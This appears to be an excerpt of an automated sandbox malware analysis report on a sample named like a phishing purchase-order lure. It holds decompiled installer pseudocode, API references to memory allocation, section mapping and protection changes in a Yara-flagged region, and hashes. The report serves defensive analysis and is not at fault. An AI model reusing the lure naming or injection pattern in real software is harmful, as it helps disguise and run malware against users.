                                                              • Opcode Fuzzy Hash: 8868b6a2426bb8f5e231bf1a7a7d8febf10f258da88ac185063839d851748521
                                                              • Instruction Fuzzy Hash: BAD013715151205FC2505F746E0C44777545F463313154F35F45AF11E0C7745C5645EC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E00402095() {
                                                              				signed int _t52;
                                                              				void* _t56;
                                                              				intOrPtr* _t60;
                                                              				intOrPtr _t61;
                                                              				intOrPtr* _t62;
                                                              				intOrPtr* _t64;
                                                              				intOrPtr* _t66;
                                                              				intOrPtr* _t68;
                                                              				intOrPtr* _t70;
                                                              				intOrPtr* _t72;
                                                              				intOrPtr* _t74;
                                                              				intOrPtr* _t76;
                                                              				intOrPtr* _t78;
                                                              				intOrPtr* _t80;
                                                              				void* _t83;
                                                              				intOrPtr* _t91;
                                                              				signed int _t101;
                                                              				signed int _t105;
                                                              				void* _t107;
                                                              
                                                              				 *((intOrPtr*)(_t107 - 0x34)) = E00402BBF(0xfffffff0);
                                                              				 *((intOrPtr*)(_t107 - 8)) = E00402BBF(0xffffffdf);
                                                              				 *((intOrPtr*)(_t107 - 0xc)) = E00402BBF(2);
                                                              				 *((intOrPtr*)(_t107 - 0x3c)) = E00402BBF(0xffffffcd);
                                                              				 *((intOrPtr*)(_t107 - 0x10)) = E00402BBF(0x45);
                                                              				_t52 =  *(_t107 - 0x1c);
                                                              				 *(_t107 - 0x40) = _t52 & 0x00000fff;
                                                              				_t101 = _t52 & 0x00008000;
                                                              				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                              				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
                                                              				if(E00405A5D( *((intOrPtr*)(_t107 - 8))) == 0) {
                                                              					E00402BBF(0x21);
                                                              				}
                                                              				_t56 = _t107 + 8;
                                                              				__imp__CoCreateInstance(0x40849c, _t83, 1, 0x40848c, _t56); // executed
                                                              				if(_t56 < _t83) {
                                                              					L14:
                                                              					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                              					_push(0xfffffff0);
                                                              				} else {
                                                              					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                              					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ac, _t107 - 0x48);
                                                              					 *((intOrPtr*)(_t107 - 0x14)) = _t61;
                                                              					if(_t61 >= _t83) {
                                                              						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                              						 *((intOrPtr*)(_t107 - 0x14)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 8)));
                                                              						if(_t101 == _t83) {
                                                              							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                              							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate");
                                                              						}
                                                              						if(_t105 != _t83) {
                                                              							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                              							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                              						}
                                                              						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                              						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
                                                              						_t91 =  *((intOrPtr*)(_t107 - 0x3c));
                                                              						if( *_t91 != _t83) {
                                                              							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                              							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x40));
                                                              						}
                                                              						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                              						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 0xc)));
                                                              						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                              						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0x10)));
                                                              						if( *((intOrPtr*)(_t107 - 0x14)) >= _t83) {
                                                              							_t74 =  *((intOrPtr*)(_t107 - 0x48));
                                                              							 *((intOrPtr*)(_t107 - 0x14)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x34)), 1);
                                                              						}
                                                              						_t72 =  *((intOrPtr*)(_t107 - 0x48));
                                                              						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                              					}
                                                              					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                              					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                              					if( *((intOrPtr*)(_t107 - 0x14)) >= _t83) {
                                                              						_push(0xfffffff4);
                                                              					} else {
                                                              						goto L14;
                                                              					}
                                                              				}
                                                              				E00401423();
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t107 - 4));
                                                              				return 0;
                                                              			}






















                                                              0x0040209e
                                                              0x004020a8
                                                              0x004020b2
                                                              0x004020bc
                                                              0x004020c7
                                                              0x004020ca
                                                              0x004020e4
                                                              0x004020e7
                                                              0x004020ed
                                                              0x004020f0
                                                              0x004020fa
                                                              0x004020fe
                                                              0x004020fe
                                                              0x00402103
                                                              0x00402114
                                                              0x0040211c
                                                              0x004021d3
                                                              0x004021d3
                                                              0x004021da
                                                              0x00402122
                                                              0x00402122
                                                              0x00402131
                                                              0x00402135
                                                              0x00402138
                                                              0x0040213e
                                                              0x0040214c
                                                              0x0040214f
                                                              0x00402151
                                                              0x0040215c
                                                              0x0040215c
                                                              0x00402161
                                                              0x00402163
                                                              0x0040216a
                                                              0x0040216a
                                                              0x0040216d
                                                              0x00402176
                                                              0x00402179
                                                              0x0040217f
                                                              0x00402181
                                                              0x0040218b
                                                              0x0040218b
                                                              0x0040218e
                                                              0x00402197
                                                              0x0040219a
                                                              0x004021a3
                                                              0x004021a9
                                                              0x004021ab
                                                              0x004021b9
                                                              0x004021b9
                                                              0x004021bc
                                                              0x004021c2
                                                              0x004021c2
                                                              0x004021c5
                                                              0x004021cb
                                                              0x004021d1
                                                              0x004021e6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004021d1
                                                              0x004021dc
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate, xrefs: 00402154
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate
                                                              • API String ID: 542301482-2207273832
                                                              • Opcode ID: a02c29aecddc9ed142f4502ba50d2b7bf96e4c42ae4d7c546ad33a93e5c34623
                                                              • Instruction ID: d47fca260cdd8e4185df19bb7459501af9c1372a1639466ce8116fcd6c853d94
                                                              • Opcode Fuzzy Hash: a02c29aecddc9ed142f4502ba50d2b7bf96e4c42ae4d7c546ad33a93e5c34623
                                                              • Instruction Fuzzy Hash: 2D414C71A00209AFCF00DFA4CD88AAD7BB5FF48314B20456AF515EB2D1DBB99A41CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL ref: 02FAE82E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 43ce33b0c3b5578a758be4be8184d043abdd3c5f79e531c91d884d103fdb47c6
                                                              • Instruction ID: fe9c1ec5c99fde462493550942aec94a9aab9d4332903b35b8bb8cf960388ba1
                                                              • Opcode Fuzzy Hash: 43ce33b0c3b5578a758be4be8184d043abdd3c5f79e531c91d884d103fdb47c6
                                                              • Instruction Fuzzy Hash: A55148B6A003898FDB709E24CC657DE37B6EFA9390F81402DDD899B214D7318A86CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: wK
                                                              • API String ID: 0-900654275
                                                              • Opcode ID: 90073aab2816698a974a2c7bfa508d6dbc268b20e185a7fb352cb1f9d5537c18
                                                              • Instruction ID: 1f0b17320c66b6eb7c85e9275c8e0ac9fe843943e01a9544e82a13d046620fbf
                                                              • Opcode Fuzzy Hash: 90073aab2816698a974a2c7bfa508d6dbc268b20e185a7fb352cb1f9d5537c18
                                                              • Instruction Fuzzy Hash: 5CD112B5A0435A8FDF349E288DA43DA37B6EF56790F55403ECC89DB605C7318A86CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileA.KERNELBASE(?,31B9E346,-5DA34677), ref: 02FAD34F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 3f030419ae650518e439fec93251c2e63ce7cdbdfa3dd531d5eb69f7dc8495b2
                                                              • Instruction ID: b28481ae60fedf2cf9196fcdbac8fd0e6b65776b2b755d8ef4f614c35eeff281
                                                              • Opcode Fuzzy Hash: 3f030419ae650518e439fec93251c2e63ce7cdbdfa3dd531d5eb69f7dc8495b2
                                                              • Instruction Fuzzy Hash: C02101351043069FCB649EB9C9D9BEBB6B2EF94380F46492E8DC997140C3704A82CB02
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtMapViewOfSection.NTDLL(00000001,02FB0F99,9376E882,00000000,?,?,?,?,02FADA45,02FA2559), ref: 02FB0B3A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: SectionView
                                                              • String ID:
                                                              • API String ID: 1323581903-0
                                                              • Opcode ID: beee6ed6b344b62c1f3933379fac16547e79e4cf08085ac47b6ad9ed961c2066
                                                              • Instruction ID: b54571096dc81bd903e5f1088ece5e18ebacfff8990bae8243462bc330626587
                                                              • Opcode Fuzzy Hash: beee6ed6b344b62c1f3933379fac16547e79e4cf08085ac47b6ad9ed961c2066
                                                              • Instruction Fuzzy Hash: 5B016232704205CEDF2A9E36CDC47DE77A1EF99388F11C52DCA06CA614EF309941C600
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL ref: 02FAFCC4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2706961497-0
                                                              • Opcode ID: 36989c77279b85197fb8c0466499f75e9b0f6a1dcdb18dd7e9bd93ff6a896f9b
                                                              • Instruction ID: 96aa6764bcd1314f19efea07e180b2930e8dfb144cbf9a839f8bcfdc3abbc510
                                                              • Opcode Fuzzy Hash: 36989c77279b85197fb8c0466499f75e9b0f6a1dcdb18dd7e9bd93ff6a896f9b
                                                              • Instruction Fuzzy Hash: 81016DB16052848FDB34DE68CD587DE77E5EFD5300F85812AEC8AAB248D3306945CB16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 591fb5e8122db522a0c4837312270c3a29b8431142da6affe9596e5469ecf6ff
                                                              • Instruction ID: a813f3f862f430fb28c65b9572cadf47ecf18c014cf517a946435f5f38c93cd9
                                                              • Opcode Fuzzy Hash: 591fb5e8122db522a0c4837312270c3a29b8431142da6affe9596e5469ecf6ff
                                                              • Instruction Fuzzy Hash: DA9144B2B0434A9FDB30AE28CDA47DF73F2AF95390F55852DDD899B204D73089858B52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88f40a3354036860d5535e9a66d5f8644600682aa1173c3c1245419e6f1eca7d
                                                              • Instruction ID: 1193a162dc929a38eae22fa1b39059ae2c59213fa0e05391378bfd06fecddb18
                                                              • Opcode Fuzzy Hash: 88f40a3354036860d5535e9a66d5f8644600682aa1173c3c1245419e6f1eca7d
                                                              • Instruction Fuzzy Hash: 6F51E3B2B0434A9BDF30AE28CDA47DE73A6AF957D0F15842EDD49DB200C7308A468B51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 186 403c1e-403c30 187 403d71-403d80 186->187 188 403c36-403c3c 186->188 190 403d82-403dca GetDlgItem * 2 call 4040f6 SetClassLongW call 40140b 187->190 191 403dcf-403de4 187->191 188->187 189 403c42-403c4b 188->189 192 403c60-403c63 189->192 193 403c4d-403c5a SetWindowPos 189->193 190->191 195 403e24-403e29 call 404142 191->195 196 403de6-403de9 191->196 198 403c65-403c77 ShowWindow 192->198 199 403c7d-403c83 192->199 193->192 204 403e2e-403e49 195->204 201 403deb-403df6 call 401389 196->201 202 403e1c-403e1e 196->202 198->199 205 403c85-403c9a DestroyWindow 199->205 206 403c9f-403ca2 199->206 201->202 217 403df8-403e17 SendMessageW 201->217 202->195 203 4040c3 202->203 212 4040c5-4040cc 203->212 210 403e52-403e58 204->210 211 403e4b-403e4d call 40140b 204->211 213 4040a0-4040a6 205->213 215 403ca4-403cb0 SetWindowLongW 206->215 216 403cb5-403cbb 206->216 220 404081-40409a DestroyWindow EndDialog 210->220 221 403e5e-403e69 210->221 211->210 213->203 218 4040a8-4040ae 213->218 215->212 222 403cc1-403cd2 GetDlgItem 216->222 223 403d5e-403d6c call 40415d 216->223 217->212 218->203 225 4040b0-4040b9 ShowWindow 218->225 220->213 221->220 226 403e6f-403ebc call 406054 call 4040f6 * 3 GetDlgItem 221->226 227 403cf1-403cf4 222->227 228 403cd4-403ceb SendMessageW IsWindowEnabled 222->228 223->212 225->203 256 403ec6-403f02 ShowWindow KiUserCallbackDispatcher call 404118 EnableWindow 226->256 257 403ebe-403ec3 226->257 229 403cf6-403cf7 227->229 230 403cf9-403cfc 227->230 228->203 228->227 233 403d27-403d2c call 4040cf 229->233 234 403d0a-403d0f 230->234 235 403cfe-403d04 230->235 233->223 237 403d45-403d58 SendMessageW 234->237 239 403d11-403d17 234->239 235->237 238 403d06-403d08 235->238 237->223 238->233 242 403d19-403d1f call 40140b 239->242 243 403d2e-403d37 call 40140b 239->243 254 403d25 242->254 243->223 252 403d39-403d43 243->252 252->254 254->233 260 403f04-403f05 256->260 261 403f07 256->261 257->256 262 403f09-403f37 GetSystemMenu EnableMenuItem SendMessageW 260->262 261->262 263 403f39-403f4a SendMessageW 262->263 264 403f4c 262->264 265 403f52-403f90 call 40412b call 406032 lstrlenW call 406054 SetWindowTextW call 401389 263->265 264->265 265->204 274 403f96-403f98 265->274 274->204 275 403f9e-403fa2 274->275 276 403fc1-403fd5 DestroyWindow 275->276 277 403fa4-403faa 275->277 276->213 279 403fdb-404008 CreateDialogParamW 276->279 277->203 278 403fb0-403fb6 277->278 278->204 280 403fbc 278->280 279->213 281 40400e-404065 call 4040f6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->281 280->203 281->203 286 404067-40407a ShowWindow call 404142 281->286 288 40407f 286->288 288->213
                                                              C-Code - Quality: 84%
                                                              			E00403C1E(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                              				struct HWND__* _v32;
                                                              				void* _v84;
                                                              				void* _v88;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t37;
                                                              				signed int _t39;
                                                              				signed int _t41;
                                                              				struct HWND__* _t51;
                                                              				signed int _t69;
                                                              				struct HWND__* _t75;
                                                              				signed int _t88;
                                                              				struct HWND__* _t93;
                                                              				signed int _t101;
                                                              				int _t105;
                                                              				signed int _t117;
                                                              				signed int _t118;
                                                              				int _t119;
                                                              				signed int _t124;
                                                              				struct HWND__* _t127;
                                                              				struct HWND__* _t128;
                                                              				int _t129;
                                                              				long _t132;
                                                              				int _t134;
                                                              				int _t135;
                                                              				void* _t136;
                                                              				void* _t144;
                                                              
                                                              				_t117 = _a8;
                                                              				if(_t117 == 0x110 || _t117 == 0x408) {
                                                              					_t37 = _a12;
                                                              					_t127 = _a4;
                                                              					__eflags = _t117 - 0x110;
                                                              					 *0x7a1f28 = _t37;
                                                              					if(_t117 == 0x110) {
                                                              						 *0x7a8a48 = _t127;
                                                              						 *0x7a1f3c = GetDlgItem(_t127, 1);
                                                              						_t93 = GetDlgItem(_t127, 2);
                                                              						_push(0xffffffff);
                                                              						_push(0x1c);
                                                              						 *0x79ff08 = _t93;
                                                              						E004040F6(_t127);
                                                              						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a28);
                                                              						 *0x7a7a0c = E0040140B(4);
                                                              						_t37 = 1;
                                                              						__eflags = 1;
                                                              						 *0x7a1f28 = 1;
                                                              					}
                                                              					_t124 =  *0x40a388; // 0x0
                                                              					_t135 = 0;
                                                              					_t132 = (_t124 << 6) +  *0x7a8a60;
                                                              					__eflags = _t124;
                                                              					if(_t124 < 0) {
                                                              						L34:
                                                              						E00404142(0x40b);
                                                              						while(1) {
                                                              							_t39 =  *0x7a1f28;
                                                              							 *0x40a388 =  *0x40a388 + _t39;
                                                              							_t132 = _t132 + (_t39 << 6);
                                                              							_t41 =  *0x40a388; // 0x0
                                                              							__eflags = _t41 -  *0x7a8a64;
                                                              							if(_t41 ==  *0x7a8a64) {
                                                              								E0040140B(1);
                                                              							}
                                                              							__eflags =  *0x7a7a0c - _t135; // 0x0
                                                              							if(__eflags != 0) {
                                                              								break;
                                                              							}
                                                              							__eflags =  *0x40a388 -  *0x7a8a64; // 0x0
                                                              							if(__eflags >= 0) {
                                                              								break;
                                                              							}
                                                              							_t118 =  *(_t132 + 0x14);
                                                              							E00406054(_t118, _t127, _t132, 0x7b8000,  *((intOrPtr*)(_t132 + 0x24)));
                                                              							_push( *((intOrPtr*)(_t132 + 0x20)));
                                                              							_push(0xfffffc19);
                                                              							E004040F6(_t127);
                                                              							_push( *((intOrPtr*)(_t132 + 0x1c)));
                                                              							_push(0xfffffc1b);
                                                              							E004040F6(_t127);
                                                              							_push( *((intOrPtr*)(_t132 + 0x28)));
                                                              							_push(0xfffffc1a);
                                                              							E004040F6(_t127);
                                                              							_t51 = GetDlgItem(_t127, 3);
                                                              							__eflags =  *0x7a8acc - _t135;
                                                              							_v32 = _t51;
                                                              							if( *0x7a8acc != _t135) {
                                                              								_t118 = _t118 & 0x0000fefd | 0x00000004;
                                                              								__eflags = _t118;
                                                              							}
                                                              							ShowWindow(_t51, _t118 & 0x00000008); // executed
                                                              							EnableWindow( *(_t136 + 0x30), _t118 & 0x00000100); // executed
                                                              							E00404118(_t118 & 0x00000002);
                                                              							_t119 = _t118 & 0x00000004;
                                                              							EnableWindow( *0x79ff08, _t119);
                                                              							__eflags = _t119 - _t135;
                                                              							if(_t119 == _t135) {
                                                              								_push(1);
                                                              							} else {
                                                              								_push(_t135);
                                                              							}
                                                              							EnableMenuItem(GetSystemMenu(_t127, _t135), 0xf060, ??);
                                                              							SendMessageW( *(_t136 + 0x38), 0xf4, _t135, 1);
                                                              							__eflags =  *0x7a8acc - _t135;
                                                              							if( *0x7a8acc == _t135) {
                                                              								_push( *0x7a1f3c);
                                                              							} else {
                                                              								SendMessageW(_t127, 0x401, 2, _t135);
                                                              								_push( *0x79ff08);
                                                              							}
                                                              							E0040412B();
                                                              							E00406032(0x7a1f40, "Overcaustically Setup");
                                                              							E00406054(0x7a1f40, _t127, _t132,  &(0x7a1f40[lstrlenW(0x7a1f40)]),  *((intOrPtr*)(_t132 + 0x18)));
                                                              							SetWindowTextW(_t127, 0x7a1f40); // executed
                                                              							_push(_t135);
                                                              							_t69 = E00401389( *((intOrPtr*)(_t132 + 8)));
                                                              							__eflags = _t69;
                                                              							if(_t69 != 0) {
                                                              								continue;
                                                              							} else {
                                                              								__eflags =  *_t132 - _t135;
                                                              								if( *_t132 == _t135) {
                                                              									continue;
                                                              								}
                                                              								__eflags =  *(_t132 + 4) - 5;
                                                              								if( *(_t132 + 4) != 5) {
                                                              									DestroyWindow( *0x7a7a18); // executed
                                                              									 *0x7a0f18 = _t132;
                                                              									__eflags =  *_t132 - _t135;
                                                              									if( *_t132 <= _t135) {
                                                              										goto L58;
                                                              									}
                                                              									_t75 = CreateDialogParamW( *0x7a8a40,  *_t132 +  *0x7a7a20 & 0x0000ffff, _t127,  *(0x40a38c +  *(_t132 + 4) * 4), _t132); // executed
                                                              									__eflags = _t75 - _t135;
                                                              									 *0x7a7a18 = _t75;
                                                              									if(_t75 == _t135) {
                                                              										goto L58;
                                                              									}
                                                              									_push( *((intOrPtr*)(_t132 + 0x2c)));
                                                              									_push(6);
                                                              									E004040F6(_t75);
                                                              									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t136 + 0x10);
                                                              									ScreenToClient(_t127, _t136 + 0x10);
                                                              									SetWindowPos( *0x7a7a18, _t135,  *(_t136 + 0x20),  *(_t136 + 0x20), _t135, _t135, 0x15);
                                                              									_push(_t135);
                                                              									E00401389( *((intOrPtr*)(_t132 + 0xc)));
                                                              									__eflags =  *0x7a7a0c - _t135; // 0x0
                                                              									if(__eflags != 0) {
                                                              										goto L61;
                                                              									}
                                                              									ShowWindow( *0x7a7a18, 8); // executed
                                                              									E00404142(0x405);
                                                              									goto L58;
                                                              								}
                                                              								__eflags =  *0x7a8acc - _t135;
                                                              								if( *0x7a8acc != _t135) {
                                                              									goto L61;
                                                              								}
                                                              								__eflags =  *0x7a8ac0 - _t135;
                                                              								if( *0x7a8ac0 != _t135) {
                                                              									continue;
                                                              								}
                                                              								goto L61;
                                                              							}
                                                              						}
                                                              						DestroyWindow( *0x7a7a18);
                                                              						 *0x7a8a48 = _t135;
                                                              						EndDialog(_t127,  *0x7a0710);
                                                              						goto L58;
                                                              					} else {
                                                              						__eflags = _t37 - 1;
                                                              						if(_t37 != 1) {
                                                              							L33:
                                                              							__eflags =  *_t132 - _t135;
                                                              							if( *_t132 == _t135) {
                                                              								goto L61;
                                                              							}
                                                              							goto L34;
                                                              						}
                                                              						_push(0);
                                                              						_t88 = E00401389( *((intOrPtr*)(_t132 + 0x10)));
                                                              						__eflags = _t88;
                                                              						if(_t88 == 0) {
                                                              							goto L33;
                                                              						}
                                                              						SendMessageW( *0x7a7a18, 0x40f, 0, 1);
                                                              						__eflags =  *0x7a7a0c - _t135; // 0x0
                                                              						return 0 | __eflags == 0x00000000;
                                                              					}
                                                              				} else {
                                                              					_t127 = _a4;
                                                              					_t135 = 0;
                                                              					if(_t117 == 0x47) {
                                                              						SetWindowPos( *0x7a1f20, _t127, 0, 0, 0, 0, 0x13);
                                                              					}
                                                              					if(_t117 == 5) {
                                                              						asm("sbb eax, eax");
                                                              						ShowWindow( *0x7a1f20,  ~(_a12 - 1) & _t117);
                                                              					}
                                                              					if(_t117 != 0x40d) {
                                                              						__eflags = _t117 - 0x11;
                                                              						if(_t117 != 0x11) {
                                                              							__eflags = _t117 - 0x111;
                                                              							if(_t117 != 0x111) {
                                                              								L26:
                                                              								return E0040415D(_t117, _a12, _a16);
                                                              							}
                                                              							_t134 = _a12 & 0x0000ffff;
                                                              							_t128 = GetDlgItem(_t127, _t134);
                                                              							__eflags = _t128 - _t135;
                                                              							if(_t128 == _t135) {
                                                              								L13:
                                                              								__eflags = _t134 - 1;
                                                              								if(_t134 != 1) {
                                                              									__eflags = _t134 - 3;
                                                              									if(_t134 != 3) {
                                                              										_t129 = 2;
                                                              										__eflags = _t134 - _t129;
                                                              										if(_t134 != _t129) {
                                                              											L25:
                                                              											SendMessageW( *0x7a7a18, 0x111, _a12, _a16);
                                                              											goto L26;
                                                              										}
                                                              										__eflags =  *0x7a8acc - _t135;
                                                              										if( *0x7a8acc == _t135) {
                                                              											_t101 = E0040140B(3);
                                                              											__eflags = _t101;
                                                              											if(_t101 != 0) {
                                                              												goto L26;
                                                              											}
                                                              											 *0x7a0710 = 1;
                                                              											L21:
                                                              											_push(0x78);
                                                              											L22:
                                                              											E004040CF();
                                                              											goto L26;
                                                              										}
                                                              										E0040140B(_t129);
                                                              										 *0x7a0710 = _t129;
                                                              										goto L21;
                                                              									}
                                                              									__eflags =  *0x40a388 - _t135; // 0x0
                                                              									if(__eflags <= 0) {
                                                              										goto L25;
                                                              									}
                                                              									_push(0xffffffff);
                                                              									goto L22;
                                                              								}
                                                              								_push(_t134);
                                                              								goto L22;
                                                              							}
                                                              							SendMessageW(_t128, 0xf3, _t135, _t135);
                                                              							_t105 = IsWindowEnabled(_t128);
                                                              							__eflags = _t105;
                                                              							if(_t105 == 0) {
                                                              								goto L61;
                                                              							}
                                                              							goto L13;
                                                              						}
                                                              						SetWindowLongW(_t127, _t135, _t135);
                                                              						return 1;
                                                              					} else {
                                                              						DestroyWindow( *0x7a7a18);
                                                              						 *0x7a7a18 = _a12;
                                                              						L58:
                                                              						if( *0x7a3f40 == _t135) {
                                                              							_t144 =  *0x7a7a18 - _t135; // 0x1043c
                                                              							if(_t144 != 0) {
                                                              								ShowWindow(_t127, 0xa); // executed
                                                              								 *0x7a3f40 = 1;
                                                              							}
                                                              						}
                                                              						L61:
                                                              						return 0;
                                                              					}
                                                              				}
                                                              			}































                                                              0x00403c27
                                                              0x00403c30
                                                              0x00403d71
                                                              0x00403d75
                                                              0x00403d79
                                                              0x00403d7b
                                                              0x00403d80
                                                              0x00403d8b
                                                              0x00403d96
                                                              0x00403d9b
                                                              0x00403d9d
                                                              0x00403d9f
                                                              0x00403da2
                                                              0x00403da7
